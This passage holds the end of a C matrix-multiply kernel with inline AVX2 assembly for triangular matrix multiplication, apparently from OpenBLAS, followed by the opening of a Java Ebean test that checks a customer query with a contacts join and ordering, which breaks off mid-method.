" vpermilpd $0x05 , %%ymm0 , %%ymm0 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm5 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm9 \n\t"
" vpermpd $0x1b , %%ymm0 , %%ymm0 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm6 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm10 \n\t"
" vpermilpd $0x05 , %%ymm0 , %%ymm0 \n\t"
" vfmadd231pd %%ymm0 , %%ymm1 , %%ymm7 \n\t"
" vfmadd231pd %%ymm0 , %%ymm2 , %%ymm11 \n\t"
" addq $8 , %0 \n\t"
" cmp %0 , %1 \n\t"
" jne 1b \n\t"
"2: \n\t"
" vbroadcastsd (%4), %%ymm0 \n\t"
" vmulpd %%ymm0 , %%ymm4 , %%ymm4 \n\t"
" vmulpd %%ymm0 , %%ymm5 , %%ymm5 \n\t"
" vmulpd %%ymm0 , %%ymm6 , %%ymm6 \n\t"
" vmulpd %%ymm0 , %%ymm7 , %%ymm7 \n\t"
" vmulpd %%ymm0 , %%ymm8 , %%ymm8 \n\t"
" vmulpd %%ymm0 , %%ymm9 , %%ymm9 \n\t"
" vmulpd %%ymm0 , %%ymm10, %%ymm10 \n\t"
" vmulpd %%ymm0 , %%ymm11, %%ymm11 \n\t"
" vpermilpd $0x05 , %%ymm5 , %%ymm5 \n\t"
" vpermilpd $0x05 , %%ymm7 , %%ymm7 \n\t"
" vblendpd $0x0a , %%ymm5 , %%ymm4 , %%ymm0 \n\t"
" vblendpd $0x05 , %%ymm5 , %%ymm4 , %%ymm1 \n\t"
" vblendpd $0x0a , %%ymm7 , %%ymm6 , %%ymm2 \n\t"
" vblendpd $0x05 , %%ymm7 , %%ymm6 , %%ymm3 \n\t"
" vperm2f128 $0x01 , %%ymm2 , %%ymm2 , %%ymm2 \n\t"
" vperm2f128 $0x01 , %%ymm3 , %%ymm3 , %%ymm3 \n\t"
" vblendpd $0x03 , %%ymm0 , %%ymm2 , %%ymm4 \n\t"
" vblendpd $0x03 , %%ymm1 , %%ymm3 , %%ymm5 \n\t"
" vblendpd $0x03 , %%ymm2 , %%ymm0 , %%ymm6 \n\t"
" vblendpd $0x03 , %%ymm3 , %%ymm1 , %%ymm7 \n\t"
" vmovups %%ymm4 , (%5) \n\t"
" vmovups %%ymm5 , (%6) \n\t"
" vmovups %%ymm6 , (%7) \n\t"
" vmovups %%ymm7 , (%8) \n\t"
" vpermilpd $0x05 , %%ymm9 , %%ymm9 \n\t"
" vpermilpd $0x05 , %%ymm11, %%ymm11 \n\t"
" vblendpd $0x0a , %%ymm9 , %%ymm8 , %%ymm0 \n\t"
" vblendpd $0x05 , %%ymm9 , %%ymm8 , %%ymm1 \n\t"
" vblendpd $0x0a , %%ymm11, %%ymm10, %%ymm2 \n\t"
" vblendpd $0x05 , %%ymm11, %%ymm10, %%ymm3 \n\t"
" vperm2f128 $0x01 , %%ymm2 , %%ymm2 , %%ymm2 \n\t"
" vperm2f128 $0x01 , %%ymm3 , %%ymm3 , %%ymm3 \n\t"
" vblendpd $0x03 , %%ymm0 , %%ymm2 , %%ymm4 \n\t"
" vblendpd $0x03 , %%ymm1 , %%ymm3 , %%ymm5 \n\t"
" vblendpd $0x03 , %%ymm2 , %%ymm0 , %%ymm6 \n\t"
" vblendpd $0x03 , %%ymm3 , %%ymm1 , %%ymm7 \n\t"
" vmovups %%ymm4 , (%9) \n\t"
" vmovups %%ymm5 , (%10) \n\t"
" vmovups %%ymm6 , (%11) \n\t"
" vmovups %%ymm7 , (%12) \n\t"
:
:
"a" (i), // 0
"r" (temp1), // 1
"S" (a), // 2
"D" (b), // 3
"r" (alpha), // 4
"r" (C0), // 5
"r" (C1), // 6
"r" (C2), // 7
"r" (C3), // 8
"r" (C4), // 9
"r" (C5), // 10
"r" (C6), // 11
"r" (C7) // 12
: "cc",
"%xmm0", "%xmm1", "%xmm2", "%xmm3",
"%xmm4", "%xmm5", "%xmm6", "%xmm7",
"%xmm8", "%xmm9", "%xmm10", "%xmm11",
"%xmm12", "%xmm13", "%xmm14", "%xmm15",
"memory"
);
}
int CNAME(BLASLONG bm,BLASLONG bn,BLASLONG bk,FLOAT alpha,FLOAT* ba,FLOAT* bb,FLOAT* C,BLASLONG ldc ,BLASLONG offset)
{
BLASLONG i,j,k;
FLOAT *C0,*C1,*C2,*C3,*C4,*C5,*C6,*C7,*ptrba,*ptrbb;
FLOAT res0_0;
FLOAT res0_1;
FLOAT res0_2;
FLOAT res0_3;
FLOAT res1_0;
FLOAT res1_1;
FLOAT res1_2;
FLOAT res1_3;
FLOAT res2_0;
FLOAT res2_1;
FLOAT res2_2;
FLOAT res2_3;
FLOAT res3_0;
FLOAT res3_1;
FLOAT res3_2;
FLOAT res3_3;
FLOAT res4_0;
FLOAT res4_1;
/*
FLOAT res4_2;
FLOAT res4_3;
*/
FLOAT res5_0;
FLOAT res5_1;
/*
FLOAT res5_2;
FLOAT res5_3;
*/
FLOAT res6_0;
FLOAT res6_1;
/*
FLOAT res6_2;
FLOAT res6_3;
*/
FLOAT res7_0;
FLOAT res7_1;
/*
FLOAT res7_2;
FLOAT res7_3;
*/
FLOAT a0;
FLOAT a1;
FLOAT b0;
FLOAT b1;
FLOAT b2;
FLOAT b3;
FLOAT b4;
FLOAT b5;
FLOAT b6;
FLOAT b7;
BLASLONG off, temp ;
bool left;
bool transposed;
bool backwards;
#ifdef LEFT
left = true;
#else
left = false;
#endif
#ifdef TRANSA
transposed = true;
#else
transposed = false;
#endif
backwards = left != transposed;
if (!left) {
off = -offset;
}
for (j=0; j<bn/8; j+=1) // do blocks of the Mx8 loops
{
C0 = C;
C1 = C0+ldc;
C2 = C1+ldc;
C3 = C2+ldc;
C4 = C3+ldc;
C5 = C4+ldc;
C6 = C5+ldc;
C7 = C6+ldc;
if (left) {
off = offset;
}
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x4
{
ptrbb = bb;
if (backwards)
{
ptrba += off*4; // number of values in A
ptrbb += off*8; // number of values in B
}
/*
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
res1_0 = 0;
res1_1 = 0;
res1_2 = 0;
res1_3 = 0;
res2_0 = 0;
res2_1 = 0;
res2_2 = 0;
res2_3 = 0;
res3_0 = 0;
res3_1 = 0;
res3_2 = 0;
res3_3 = 0;
res4_0 = 0;
res4_1 = 0;
res4_2 = 0;
res4_3 = 0;
res5_0 = 0;
res5_1 = 0;
res5_2 = 0;
res5_3 = 0;
res6_0 = 0;
res6_1 = 0;
res6_2 = 0;
res6_3 = 0;
res7_0 = 0;
res7_1 = 0;
res7_2 = 0;
res7_3 = 0;
*/
temp = backwards ? bk-off :
left ? off + 4 : // number of values in A
off + 8; // number of values in B
dtrmm_kernel_4x8( temp, &alpha , ptrba, ptrbb, C0, C1, C2, C3, C4, C5, C6, C7);
ptrba = ptrba + temp * 4;
ptrbb = ptrbb + temp * 8;
/*
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
b4 = ptrbb[4];
b5 = ptrbb[5];
b6 = ptrbb[6];
b7 = ptrbb[7];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
res4_0 += a0*b4;
res5_0 += a0*b5;
res6_0 += a0*b6;
res7_0 += a0*b7;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
res4_1 += a1*b4;
res5_1 += a1*b5;
res6_1 += a1*b6;
res7_1 += a1*b7;
a0 = ptrba[2];
res0_2 += a0*b0;
res1_2 += a0*b1;
res2_2 += a0*b2;
res3_2 += a0*b3;
res4_2 += a0*b4;
res5_2 += a0*b5;
res6_2 += a0*b6;
res7_2 += a0*b7;
a1 = ptrba[3];
res0_3 += a1*b0;
res1_3 += a1*b1;
res2_3 += a1*b2;
res3_3 += a1*b3;
res4_3 += a1*b4;
res5_3 += a1*b5;
res6_3 += a1*b6;
res7_3 += a1*b7;
ptrba = ptrba+4;
ptrbb = ptrbb+8;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res1_2 *= alpha;
res1_3 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res2_2 *= alpha;
res2_3 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
res3_2 *= alpha;
res3_3 *= alpha;
res4_0 *= alpha;
res4_1 *= alpha;
res4_2 *= alpha;
res4_3 *= alpha;
res5_0 *= alpha;
res5_1 *= alpha;
res5_2 *= alpha;
res5_3 *= alpha;
res6_0 *= alpha;
res6_1 *= alpha;
res6_2 *= alpha;
res6_3 *= alpha;
res7_0 *= alpha;
res7_1 *= alpha;
res7_2 *= alpha;
res7_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
C1[0] = res1_0;
C1[1] = res1_1;
C1[2] = res1_2;
C1[3] = res1_3;
C2[0] = res2_0;
C2[1] = res2_1;
C2[2] = res2_2;
C2[3] = res2_3;
C3[0] = res3_0;
C3[1] = res3_1;
C3[2] = res3_2;
C3[3] = res3_3;
C4[0] = res4_0;
C4[1] = res4_1;
C4[2] = res4_2;
C4[3] = res4_3;
C5[0] = res5_0;
C5[1] = res5_1;
C5[2] = res5_2;
C5[3] = res5_3;
C6[0] = res6_0;
C6[1] = res6_1;
C6[2] = res6_2;
C6[3] = res6_3;
C7[0] = res7_0;
C7[1] = res7_1;
C7[2] = res7_2;
C7[3] = res7_3;
*/
if (!backwards) {
temp = bk-off;
temp = left ? temp - 4 : // number of values in A
temp - 8; // number of values in B
ptrba += temp*4; // number of values in A
ptrbb += temp*8; // number of values in B
}
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
C1 = C1+4;
C2 = C2+4;
C3 = C3+4;
C4 = C4+4;
C5 = C5+4;
C6 = C6+4;
C7 = C7+4;
}
if ( bm & 2 ) // do any 2x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*8;
#endif
res0_0 = 0;
res0_1 = 0;
res1_0 = 0;
res1_1 = 0;
res2_0 = 0;
res2_1 = 0;
res3_0 = 0;
res3_1 = 0;
res4_0 = 0;
res4_1 = 0;
res5_0 = 0;
res5_1 = 0;
res6_0 = 0;
res6_1 = 0;
res7_0 = 0;
res7_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+8; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
b4 = ptrbb[4];
b5 = ptrbb[5];
b6 = ptrbb[6];
b7 = ptrbb[7];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
res4_0 += a0*b4;
res5_0 += a0*b5;
res6_0 += a0*b6;
res7_0 += a0*b7;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
res4_1 += a1*b4;
res5_1 += a1*b5;
res6_1 += a1*b6;
res7_1 += a1*b7;
ptrba = ptrba+2;
ptrbb = ptrbb+8;
}
res0_0 *= alpha;
res0_1 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
res4_0 *= alpha;
res4_1 *= alpha;
res5_0 *= alpha;
res5_1 *= alpha;
res6_0 *= alpha;
res6_1 *= alpha;
res7_0 *= alpha;
res7_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C1[0] = res1_0;
C1[1] = res1_1;
C2[0] = res2_0;
C2[1] = res2_1;
C3[0] = res3_0;
C3[1] = res3_1;
C4[0] = res4_0;
C4[1] = res4_1;
C5[0] = res5_0;
C5[1] = res5_1;
C6[0] = res6_0;
C6[1] = res6_1;
C7[0] = res7_0;
C7[1] = res7_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 8; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*8;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
C1 = C1+2;
C2 = C2+2;
C3 = C3+2;
C4 = C4+2;
C5 = C5+2;
C6 = C6+2;
C7 = C7+2;
}
if ( bm & 1 ) // do any 1x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*8;
#endif
res0_0 = 0;
res1_0 = 0;
res2_0 = 0;
res3_0 = 0;
res4_0 = 0;
res5_0 = 0;
res6_0 = 0;
res7_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+8; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
b4 = ptrbb[4];
b5 = ptrbb[5];
b6 = ptrbb[6];
b7 = ptrbb[7];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
res4_0 += a0*b4;
res5_0 += a0*b5;
res6_0 += a0*b6;
res7_0 += a0*b7;
ptrba = ptrba+1;
ptrbb = ptrbb+8;
}
res0_0 *= alpha;
res1_0 *= alpha;
res2_0 *= alpha;
res3_0 *= alpha;
res4_0 *= alpha;
res5_0 *= alpha;
res6_0 *= alpha;
res7_0 *= alpha;
C0[0] = res0_0;
C1[0] = res1_0;
C2[0] = res2_0;
C3[0] = res3_0;
C4[0] = res4_0;
C5[0] = res5_0;
C6[0] = res6_0;
C7[0] = res7_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 8; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*8;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
C1 = C1+1;
C2 = C2+1;
C3 = C3+1;
C4 = C4+1;
C5 = C5+1;
C6 = C6+1;
C7 = C7+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 8;
#endif
k = (bk<<3);
bb = bb+k;
i = (ldc<<3);
C = C+i;
}
for (j=0; j<(bn&4); j+=4) // do blocks of the Mx4 loops
{
C0 = C;
C1 = C0+ldc;
C2 = C1+ldc;
C3 = C2+ldc;
if (left) {
off = offset;
}
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x4
{
ptrbb = bb;
if (backwards)
{
ptrba += off*4; // number of values in A
ptrbb += off*4; // number of values in B
}
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
res1_0 = 0;
res1_1 = 0;
res1_2 = 0;
res1_3 = 0;
res2_0 = 0;
res2_1 = 0;
res2_2 = 0;
res2_3 = 0;
res3_0 = 0;
res3_1 = 0;
res3_2 = 0;
res3_3 = 0;
temp = backwards ? bk-off : off + 4;
/* left ? off + 4 : // number of values in A
off + 4; // number of values in B */
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
a0 = ptrba[2];
res0_2 += a0*b0;
res1_2 += a0*b1;
res2_2 += a0*b2;
res3_2 += a0*b3;
a1 = ptrba[3];
res0_3 += a1*b0;
res1_3 += a1*b1;
res2_3 += a1*b2;
res3_3 += a1*b3;
ptrba = ptrba+4;
ptrbb = ptrbb+4;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res1_2 *= alpha;
res1_3 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res2_2 *= alpha;
res2_3 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
res3_2 *= alpha;
res3_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
C1[0] = res1_0;
C1[1] = res1_1;
C1[2] = res1_2;
C1[3] = res1_3;
C2[0] = res2_0;
C2[1] = res2_1;
C2[2] = res2_2;
C2[3] = res2_3;
C3[0] = res3_0;
C3[1] = res3_1;
C3[2] = res3_2;
C3[3] = res3_3;
if (!backwards) {
temp = bk-off - 4;
/* temp = left ? temp - 4 : // number of values in A
temp - 4; // number of values in B */
ptrba += temp*4; // number of values in A
ptrbb += temp*4; // number of values in B
}
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
C1 = C1+4;
C2 = C2+4;
C3 = C3+4;
}
if ( bm & 2 ) // do any 2x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*4;
#endif
res0_0 = 0;
res0_1 = 0;
res1_0 = 0;
res1_1 = 0;
res2_0 = 0;
res2_1 = 0;
res3_0 = 0;
res3_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+4; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
res2_1 += a1*b2;
res3_1 += a1*b3;
ptrba = ptrba+2;
ptrbb = ptrbb+4;
}
res0_0 *= alpha;
res0_1 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res2_0 *= alpha;
res2_1 *= alpha;
res3_0 *= alpha;
res3_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C1[0] = res1_0;
C1[1] = res1_1;
C2[0] = res2_0;
C2[1] = res2_1;
C3[0] = res3_0;
C3[1] = res3_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 4; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*4;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
C1 = C1+2;
C2 = C2+2;
C3 = C3+2;
}
if ( bm & 1 ) // do any 1x4 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*4;
#endif
res0_0 = 0;
res1_0 = 0;
res2_0 = 0;
res3_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+4; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
b2 = ptrbb[2];
b3 = ptrbb[3];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
res2_0 += a0*b2;
res3_0 += a0*b3;
ptrba = ptrba+1;
ptrbb = ptrbb+4;
}
res0_0 *= alpha;
res1_0 *= alpha;
res2_0 *= alpha;
res3_0 *= alpha;
C0[0] = res0_0;
C1[0] = res1_0;
C2[0] = res2_0;
C3[0] = res3_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 4; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*4;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
C1 = C1+1;
C2 = C2+1;
C3 = C3+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 4;
#endif
k = (bk<<2);
bb = bb+k;
i = (ldc<<2);
C = C+i;
}
for (j=0; j<(bn&2); j+=2) // do the Mx2 loops
{
C0 = C;
C1 = C0+ldc;
#if defined(TRMMKERNEL) && defined(LEFT)
off = offset;
#endif
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x2
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*4;
ptrbb = bb + off*2;
#endif
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
res1_0 = 0;
res1_1 = 0;
res1_2 = 0;
res1_3 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+4; // number of values in A
#else
temp = off+2; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
a0 = ptrba[2];
res0_2 += a0*b0;
res1_2 += a0*b1;
a1 = ptrba[3];
res0_3 += a1*b0;
res1_3 += a1*b1;
ptrba = ptrba+4;
ptrbb = ptrbb+2;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
res1_2 *= alpha;
res1_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
C1[0] = res1_0;
C1[1] = res1_1;
C1[2] = res1_2;
C1[3] = res1_3;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 4; // number of values in A
#else
temp -= 2; // number of values in B
#endif
ptrba += temp*4;
ptrbb += temp*2;
#endif
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
C1 = C1+4;
}
if ( bm & 2 ) // do any 2x2 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*2;
#endif
res0_0 = 0;
res0_1 = 0;
res1_0 = 0;
res1_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+2; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
a1 = ptrba[1];
res0_1 += a1*b0;
res1_1 += a1*b1;
ptrba = ptrba+2;
ptrbb = ptrbb+2;
}
res0_0 *= alpha;
res0_1 *= alpha;
res1_0 *= alpha;
res1_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C1[0] = res1_0;
C1[1] = res1_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 2; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*2;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
C1 = C1+2;
}
if ( bm & 1 ) // do any 1x2 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*2;
#endif
res0_0 = 0;
res1_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+2; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
b1 = ptrbb[1];
a0 = ptrba[0];
res0_0 += a0*b0;
res1_0 += a0*b1;
ptrba = ptrba+1;
ptrbb = ptrbb+2;
}
res0_0 *= alpha;
res1_0 *= alpha;
C0[0] = res0_0;
C1[0] = res1_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 2; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*2;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
C1 = C1+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 2;
#endif
k = (bk<<1);
bb = bb+k;
i = (ldc<<1);
C = C+i;
}
for (j=0; j<(bn&1); j+=1) // do the Mx1 loops
{
C0 = C;
#if defined(TRMMKERNEL) && defined(LEFT)
off = offset;
#endif
ptrba = ba;
for (i=0; i<bm/4; i+=1) // do blocks of 4x1 loops
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*4;
ptrbb = bb + off*1;
#endif
res0_0 = 0;
res0_1 = 0;
res0_2 = 0;
res0_3 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+4; // number of values in A
#else
temp = off+1; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
a0 = ptrba[0];
res0_0 += a0*b0;
a1 = ptrba[1];
res0_1 += a1*b0;
a0 = ptrba[2];
res0_2 += a0*b0;
a1 = ptrba[3];
res0_3 += a1*b0;
ptrba = ptrba+4;
ptrbb = ptrbb+1;
}
res0_0 *= alpha;
res0_1 *= alpha;
res0_2 *= alpha;
res0_3 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
C0[2] = res0_2;
C0[3] = res0_3;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 4; // number of values in A
#else
temp -= 1; // number of values in B
#endif
ptrba += temp*4;
ptrbb += temp*1;
#endif
#ifdef LEFT
off += 4; // number of values in A
#endif
C0 = C0+4;
}
if ( bm & 2 ) // do any 2x1 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*2;
ptrbb = bb + off*1;
#endif
res0_0 = 0;
res0_1 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+2; // number of values in A
#else
temp = off+1; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
a0 = ptrba[0];
res0_0 += a0*b0;
a1 = ptrba[1];
res0_1 += a1*b0;
ptrba = ptrba+2;
ptrbb = ptrbb+1;
}
res0_0 *= alpha;
res0_1 *= alpha;
C0[0] = res0_0;
C0[1] = res0_1;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 2; // number of values in A
#else
temp -= 1; // number of values in B
#endif
ptrba += temp*2;
ptrbb += temp*1;
#endif
#ifdef LEFT
off += 2; // number of values in A
#endif
C0 = C0+2;
}
if ( bm & 1 ) // do any 1x1 loop
{
#if (defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
ptrbb = bb;
#else
ptrba += off*1;
ptrbb = bb + off*1;
#endif
res0_0 = 0;
#if (defined(LEFT) && !defined(TRANSA)) || (!defined(LEFT) && defined(TRANSA))
temp = bk-off;
#elif defined(LEFT)
temp = off+1; // number of values in A
#else
temp = off+1; // number of values in B
#endif
for (k=0; k<temp; k++)
{
b0 = ptrbb[0];
a0 = ptrba[0];
res0_0 += a0*b0;
ptrba = ptrba+1;
ptrbb = ptrbb+1;
}
res0_0 *= alpha;
C0[0] = res0_0;
#if ( defined(LEFT) && defined(TRANSA)) || (!defined(LEFT) && !defined(TRANSA))
temp = bk - off;
#ifdef LEFT
temp -= 1; // number of values in A
#else
temp -= 1; // number of values in B
#endif
ptrba += temp*1;
ptrbb += temp*1;
#endif
#ifdef LEFT
off += 1; // number of values in A
#endif
C0 = C0+1;
}
#if defined(TRMMKERNEL) && !defined(LEFT)
off += 1;
#endif
k = (bk<<0);
bb = bb+k;
C = C+ldc;
}
return 0;
}
| {
"pile_set_name": "Github"
} |
package org.tests.query;
import io.ebean.BaseTestCase;
import io.ebean.Ebean;
import org.tests.model.basic.Customer;
import org.tests.model.basic.ResetBasicData;
import org.junit.Assert;
import org.junit.Test;
import java.util.List;
public class TestQueryPathJoinAndOrder extends BaseTestCase {
@Test
public void test() {
ResetBasicData.reset();
List<Customer> list = Ebean.find(Customer.class).select("id,name, status").fetch("contacts")
.order().asc("id").order().desc("contacts.firstName").setMaxRows(3).findList();
Assert.assertNotNull(list);
